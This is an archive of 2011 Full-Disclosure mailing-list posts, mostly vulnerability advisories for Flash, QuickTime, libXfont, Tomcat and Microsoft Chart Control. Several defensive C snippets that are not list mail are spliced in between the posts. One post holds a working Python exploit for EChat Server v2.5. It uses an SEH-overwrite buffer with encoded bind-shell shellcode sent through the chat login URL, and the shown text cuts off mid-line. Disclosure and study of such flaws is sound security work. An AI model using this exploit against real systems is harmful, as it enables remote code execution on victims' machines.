[Full-disclosure] ZDI-11-253: Adobe Flash Player BitmapData.scroll Integer Overflow Remote Code Execution Vulnerability
ZDI-11-253: Adobe Flash Player BitmapData.scroll Integer Overflow Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-253
August 12, 2011

-- CVE ID:
CVE-2011-2138

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Flash Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the code responsible for evaluating the scroll method of the ActionScript Bitmap class. The function that uses the parameters to the scroll method performs arithmetic using data from the instantiated Bitmap object. By creating a Bitmap with certain integer values and subsequently calling the scroll method with other large integer values it is possible to force an integer wrap to occur. The resulting value is utilized to calculate a pointer which is operated upon by memory copy operations. By crafting specific values this issue can be exploited to execute remote code in the context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-21.html

-- Disclosure Timeline:
2011-06-02 - Vulnerability reported to vendor
2011-08-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:
http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-252: Apple QuickTime PICT Image PnSize Opcode Remote Code Execution Vulnerability
ZDI-11-252: Apple QuickTime PICT Image PnSize Opcode Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-252
August 8, 2011

-- CVE ID:
CVE-2011-0257

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple QuickTime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the way QuickTime handles the PnSize PICT opcode. It converts an unsigned 16 bit value into a signed 32 bit value. This value is later used as the size parameter for a memory copy function that copies from the file onto the stack. This results in a stack-based buffer overflow that allows for remote code execution under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be found at:
http://support.apple.com/kb/HT4826

-- Disclosure Timeline:
2011-04-11 - Vulnerability reported to vendor
2011-08-08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Matt "j00ru" Jurczyk

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:
http://twitter.com/thezdi
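The two ZDI advisories above (ZDI-11-253 and ZDI-11-252) describe the same defensive lesson from two angles: an integer wrap in the arithmetic that derives a copy pointer, and a file-supplied size handed to a copy onto the stack without a bounds check. The C below is an added illustration of the missing checks, not code from either advisory or vendor; the pixel layout, the 64-byte stack buffer, the big-endian length encoding and the function names are assumptions chosen for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Model of a scroll-style pixel move: the destination pixel is derived from
 * caller-supplied offsets and the bitmap's own dimensions. Every add and
 * multiply is overflow-checked instead of being allowed to wrap, and the
 * result is bounds-checked against the pixel buffer. Returns the byte offset
 * of the destination pixel, or -1 when the request is rejected.
 * Assumed layout: 32-bit pixels, row-major, no row padding. */
int64_t checked_scroll_offset(int32_t width, int32_t height,
                              int32_t x, int32_t y, int32_t dx, int32_t dy)
{
    int32_t col, row, pixels, index;

    if (width <= 0 || height <= 0)
        return -1;
    if (__builtin_add_overflow(x, dx, &col) ||
        __builtin_add_overflow(y, dy, &row))
        return -1;                        /* the wrap the advisory describes */
    if (col < 0 || row < 0 || col >= width || row >= height)
        return -1;                        /* destination outside the bitmap */
    if (__builtin_mul_overflow(width, height, &pixels) ||
        __builtin_mul_overflow(row, width, &index) ||
        __builtin_add_overflow(index, col, &index))
        return -1;                        /* buffer size itself would wrap */
    return (int64_t)index * 4;            /* index < pixels, so in range */
}

#define PNSIZE_BUF 64   /* assumed size of the fixed stack buffer */

/* Model of the PnSize pattern: a 16-bit length read from the file decides how
 * many bytes are copied into a fixed stack buffer. The original flaw widened
 * that value and passed it straight to the copy; the check below is the one
 * that was missing. Returns the byte count copied, or -1 when rejected.
 * Assumed encoding: big-endian length followed directly by the data. */
int checked_pnsize_copy(const uint8_t *file, size_t file_len, size_t pos)
{
    uint8_t stack_buf[PNSIZE_BUF];
    uint32_t len;

    if (file_len < 2 || pos > file_len - 2)       /* need 2 bytes of length */
        return -1;
    len = ((uint32_t)file[pos] << 8) | file[pos + 1];
    pos += 2;
    if (len > sizeof stack_buf || len > file_len - pos)
        return -1;                                /* too big for buffer/file */
    memcpy(stack_buf, file + pos, len);
    return (int)len;
}

/* Constructed sample opcode payloads: a sane 4-byte record and one whose
 * length field (0xFFFF) far exceeds both the buffer and the file. */
const uint8_t sample_ok[]  = {0x00, 0x04, 'a', 'b', 'c', 'd'};
const uint8_t sample_bad[] = {0xFF, 0xFF, 'a', 'b', 'c', 'd'};

int main(void)
{
    printf("scroll in range : %lld\n",
           (long long)checked_scroll_offset(640, 480, 10, 10, 5, 5));
    printf("scroll wrapped  : %lld\n",
           (long long)checked_scroll_offset(640, 480, 10, 10, INT32_MAX, 0));
    printf("pnsize accepted : %d\n",
           checked_pnsize_copy(sample_ok, sizeof sample_ok, 0));
    printf("pnsize rejected : %d\n",
           checked_pnsize_copy(sample_bad, sizeof sample_bad, 0));
    return 0;
}
```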
Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
These guys just ought to be really happy it's a fricken pain in the ass to get mod_frontpage 5.2 working these days, or some highly annoyed person could start churning up a private exploit for the known associated vulnerability. That, or fire up Canvas/Core Impact (I don't remember which one had the exploit for it), but sadly there's no public exploit for it or he would likely have gone down fast and hard.
[Full-disclosure] INSECT Pro - Exploit EChat Server <= v2.5 20110812 - Remote Buffer Overflow Exploit
Information

Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl)

Description
--
EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Exploit example as follows:

#!/usr/bin/python
# Easy Chat Server <= v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: jsa...@insecurityresearch.com
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3

import string, sys
import socket, httplib
import telnetlib

def howtousage():
    print "Sorry, required arguments: Host Port"
    sys.exit(-1)

def run():
    try:
        # Basic structure: JUNK + NSEH + SEH + SHELLCODE
        Junk = '\x41' * 216          # 216 bytes of A
        nSEH = '\xEB\x06\x90\x90'    # JMP 6 bytes short
        SEH = '\xE1\xB2\x01\x10'     # 0x1001b2e1 pop edi; pop esi; ret
        # ShellCode Bind TCP PORT 444 Length 751 Encode : Alpha Upper
        ShellCode = (
        "\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
        "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
        "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
        "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
        "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"
        "\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"
        "\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
        "\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"
        "\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
        "\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
        "\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"
        "\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
        "\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"
        "\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"
        "\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"
        "\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"
        "\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"
        "\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
        "\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"
        "\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
        "\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
        "\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"
        "\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
        "\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"
        "\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"
        "\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"
        "\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"
        "\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"
        "\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"
        "\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"
        "\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"
        "\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"
        "\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"
        "\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"
        "\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"
        "\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"
        "\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"
        "\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"
        "\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"
        "\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"
        "\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"
        "\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"
        "\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"
        "\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"
        "\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"
        "\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"
        "\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"
        "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"
        "\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"
        "\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
        "\x41")
        ShellCodePort = CraftedBuffer = Junk + nSEH + SEH + ShellCode
        vulnerableURL = '/chat.ghp?username=' + CraftedBuffer + '&password=null&room=1&null=2'
        Connection = httplib.HTTPConnection(Host,
[Full-disclosure] [SECURITY] [DSA 2293-1] libxfont security update
- ------------------------------------------------------------------------
Debian Security Advisory DSA-2293-1                   secur...@debian.org
http://www.debian.org/security/                         Thijs Kinkhorst
August 12, 2011                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libxfont
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2011-2895

Tomas Hoger found a buffer overflow in the X.Org libXfont library, which may allow for a local privilege escalation through crafted font files.

For the oldstable distribution (lenny), this problem has been fixed in version 1.3.3-2.

For the stable distribution (squeeze), this problem has been fixed in version 1.4.1-3.

For the unstable distribution (sid), this problem has been fixed in version 1.4.4-1.

We recommend that you upgrade your libxfont packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Re: [Full-disclosure] DEF CON 19 - hackers get hacked!
wow. this is just fucking crazy. any thought on who was behind it? i cannot find anyone taking credit. does anyone else think mayhaps the government might have something to do with this?

On Thu, Aug 11, 2011 at 8:44 AM, Basan wrote:
> - Original Message -
> From: -= Glowing Sex =-
> Sent: 08/10/11 10:56 AM
> To: coderman
> Subject: Re: [Full-disclosure] DEF CON 19 - hackers get hacked!
>
> > times are a changing... but, i see now what you mean... still, i just don't know why people even INSTALL or, accept anything at a defcon meeting, ofc someone will try to make some name, mining for data, is stealing an id nowadays, so there would be great potential for one device, to connect to some network, and rescan for other weak/known exploits... then you have an army :)
>
> To my knowledge, I was watching people's devices getting popped with little to no interaction by their part. If memory serves me correctly maybe someone did an apt-get update on their machine, but outside of that just the usual browsing and remote work.
>
> > but, interesting about 4G... i have not yet to see that haxd so, 1 point for that but, that's prolly coz i aint really been looking at that side of it
>
> It was impressive. Essentially if you had a device on and near the Rio during (and for some time after) DEF CON, you had a high chance of being compromised.
>
> --
> Basan - Your friendly fire-breathing chicken monster
[Full-disclosure] [SECURITY] CVE-2011-2481: Apache Tomcat information disclosure vulnerability
CVE-2011-2481: Apache Tomcat information disclosure vulnerability

Severity: low

Vendor: The Apache Software Foundation

Versions Affected:
Tomcat 7.0.0 to 7.0.16
Previous versions are not affected.

Description:
The re-factoring of XML validation for Tomcat 7.0.x re-introduced the vulnerability previously reported as CVE-2009-0783. This was initially reported as a memory leak (https://issues.apache.org/bugzilla/show_bug.cgi?id=51395). If a web application is the first web application loaded, this bug allows that web application to potentially view and/or alter the web.xml, context.xml and tld files of other web applications deployed on the Tomcat instance.

Mitigation:
7.0.x users should upgrade to 7.0.17 or later

Example:
See https://issues.apache.org/bugzilla/show_bug.cgi?id=29936#c12 for an example web application that can be used to replace the XML parser used by Tomcat.

Credit:
The security implications of bug 51395 were identified by the Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html

The Apache Tomcat Security Team
[Full-disclosure] [SECURITY] CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat)
CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat)

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Tomcat 7.0.0 to 7.0.19
Tomcat 6.0.30 to 6.0.32
Tomcat 5.5.32 to 5.5.33

Description:
Due to a bug in the capabilities code, jsvc (the service wrapper for Linux that is part of the Commons Daemon project) does not drop capabilities, allowing the application to access files and directories owned by the superuser.

This vulnerability only applies if:
a) Tomcat is running on a Linux operating system
b) jsvc was compiled with libcap
c) the -user parameter is used

The Tomcat versions above shipped with source files for jsvc that included this vulnerability.

Mitigation:
Affected users of all versions can mitigate these vulnerabilities by taking any of the following actions:
a) upgrade to jsvc 1.0.7 or later
b) do not use the -user parameter to switch user
c) recompile jsvc without libcap support

Updated jsvc source is included in Apache Tomcat 7.0.20 and will be included in the next releases of Tomcat 6.0.x and 5.5.x. Updated source can be obtained from the Apache Commons Daemon project.

Credit:
This issue was identified by Wilfried Weissmann.
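A check an administrator can run against the advisory's conditions (b) and (c) after the mitigation: added here as an example, not Commons Daemon or Tomcat code. It parses the CapEff field that Linux exposes in /proc/<pid>/status; the policy that a jsvc child switched with -user should retain at most CAP_NET_BIND_SERVICE, the sample status excerpts, and the function names are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Capability bit numbers as defined in <linux/capability.h>. Only the bits
 * relevant to "access files owned by the superuser" and to the privileged
 * port binding jsvc uses libcap for are named; others print as "other". */
static const char *cap_name(int bit)
{
    switch (bit) {
    case 0:  return "CAP_CHOWN";
    case 1:  return "CAP_DAC_OVERRIDE";
    case 2:  return "CAP_DAC_READ_SEARCH";
    case 3:  return "CAP_FOWNER";
    case 6:  return "CAP_SETGID";
    case 7:  return "CAP_SETUID";
    case 10: return "CAP_NET_BIND_SERVICE";
    default: return "other";
    }
}

/* Extract the effective capability mask from /proc/<pid>/status text.
 * Returns the mask, or UINT64_MAX when no CapEff line is present. */
uint64_t capeff_of(const char *status_text)
{
    const char *p = strstr(status_text, "CapEff:");
    if (p == NULL)
        return UINT64_MAX;
    /* strtoull skips the tab/spaces that follow the field name. */
    return strtoull(p + strlen("CapEff:"), NULL, 16);
}

/* Assumed policy for this example: after -user, a jsvc child should hold at
 * most CAP_NET_BIND_SERVICE (bit 10). Every other effective bit means the
 * drop did not happen. Returns the mask of such unexpected bits. */
uint64_t unexpected_caps(uint64_t capeff)
{
    const uint64_t allowed = (uint64_t)1 << 10;
    return capeff & ~allowed;
}

/* Print each unexpected capability by name; returns how many were found. */
int report_caps(uint64_t capeff)
{
    uint64_t bad = unexpected_caps(capeff);
    int n = 0;
    for (int bit = 0; bit < 64; bit++) {
        if (bad & ((uint64_t)1 << bit)) {
            printf("  unexpected effective capability %d (%s)\n", bit, cap_name(bit));
            n++;
        }
    }
    return n;
}

/* Constructed /proc/<pid>/status excerpts: a child that kept only
 * CAP_NET_BIND_SERVICE, and a child that kept every bit (the bug). */
const char sample_dropped[] =
    "Name:\tjsvc\nUid:\t1001\t1001\t1001\t1001\n"
    "CapPrm:\t0000000000000400\nCapEff:\t0000000000000400\n";
const char sample_not_dropped[] =
    "Name:\tjsvc\nUid:\t1001\t1001\t1001\t1001\n"
    "CapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n";

int main(void)
{
    /* On a live system, read /proc/<pid>/status of the jsvc child instead. */
    printf("dropped child: %d unexpected\n", report_caps(capeff_of(sample_dropped)));
    printf("buggy child:\n");
    printf("  total: %d unexpected\n", report_caps(capeff_of(sample_not_dropped)));
    return 0;
}
```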
[Full-disclosure] [Announcement] ClubHack Magazine Issue 19-August2011
Hello All,

here we are with issue 19 of ClubHack Mag for the month of August 2011. Unlike other issues, this is not theme based!

This issue covers the following articles:
0x00 Tech Gyan - Gonna' Break It On Down Gonna' Kick It Root Down
0x01 Tool Gyan - SniffJoke – Defeating Interception Framework
0x02 Mom's Guide - RSA Security
0x03 Legal Gyan - Patent Law and Computer technology
0x04 Matriux Vibhag - SOCIAL ENGINEERING TOOLKIT
0x05 Poster of the Month.

Check http://chmag.in for articles.
The PDF version can be downloaded from: http://chmag.in/issue/aug2011.pdf

Hope you'll enjoy the magazine. Please send your suggestions and feedback to i...@chmag.in

Regards,
Abhijeet Patil,
ClubHack Mag
URL: http://chmag.in
http://clubhack.com
Re: [Full-disclosure] Context IS Advisory - MS11-066 .NET 4 - Microsoft Chart Control
Is there a POC or an exploit already for this vulnerability?

On Thu, Aug 11, 2011 at 9:38 PM, Context IS - Disclosure wrote:
> ===ADVISORY===
> Systems Affected: .NET 4 - Microsoft Chart Control
> Severity: High
> Category: Information Disclosure
> Author: Context Information Security Ltd
> Reported to vendor: 3rd October 2010
> Advisory Issued: 11th August 2011
> Reference: MS11-066, CVE-2011-1977
> ===ADVISORY===
[Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x0B
Hi guys :)

Welcome to day 11 of amazing k-rad-tastic MOHSEP. The only security project with more photoshops than travisto has bugs in Flash. Remember Travis, a single case file does not equal a bug! It does not equal a funny photoshop either, which is why we only publish the very best submissions.

Anyway, link is here: http://mohsepblog.blogspot.com/2011/08/thursday-august-11th-2011.html

enjoy, until tomorrow

Herr E Balls
[Full-disclosure] Context IS Advisory - MS11-066 .NET 4 - Microsoft Chart Control
===ADVISORY===
Systems Affected: .NET 4 - Microsoft Chart Control
Severity: High
Category: Information Disclosure
Author: Context Information Security Ltd
Reported to vendor: 3rd October 2010
Advisory Issued: 11th August 2011
Reference: MS11-066, CVE-2011-1977
===ADVISORY===

Description
---
The Microsoft Chart Control is vulnerable to an information disclosure vulnerability. By sending a specific GET request to an application implementing the chart control, attackers could read arbitrary files on the system.

Analysis
---
The Microsoft Chart Control plots graphs and, with the default configuration, stores those as image files in a directory on the system. The graph images are retrieved using GET requests and a file path parameter.

When the control retrieves a request, it verifies that the requested file path lies within the allowed directory and, if so, reads and returns the file's contents. However, the verification process was found to be flawed, resulting in the ability to traverse directories to load arbitrary files.

The Microsoft Chart Control is included in the .NET Framework 4 or can be downloaded separately for .NET 3.5 (http://code.msdn.microsoft.com/mschart).

This vulnerability was found using the Context App Tool (CAT http://cat.contextis.com).

Technologies Affected
---
Microsoft .Net Framework 4

Vendor Response
---
Microsoft advises users to patch the .Net Framework to the latest version. See the following Microsoft security bulletin for more details:
http://www.microsoft.com/technet/security/Bulletin/MS11-066.mspx

Disclosure Timeline
---
3rd October 2010 – Vendor Notification
4th October 2010 – First Vendor Response
16th November 2010 – Vendor Confirms Vulnerability
9th August 2011 – Vendor Patch Released

Credits
---
Nico Leidecker and James Forshaw of Context Information Security Ltd

About Context Information Security
---
Context Information Security is an independent security consultancy specialising in both technical security and information assurance services.

The company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners. We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and to the independence, integrity and technical skills of our consultants.

The company's client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations.

The best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report.

Web: www.contextis.com
Email: disclos...@contextis.com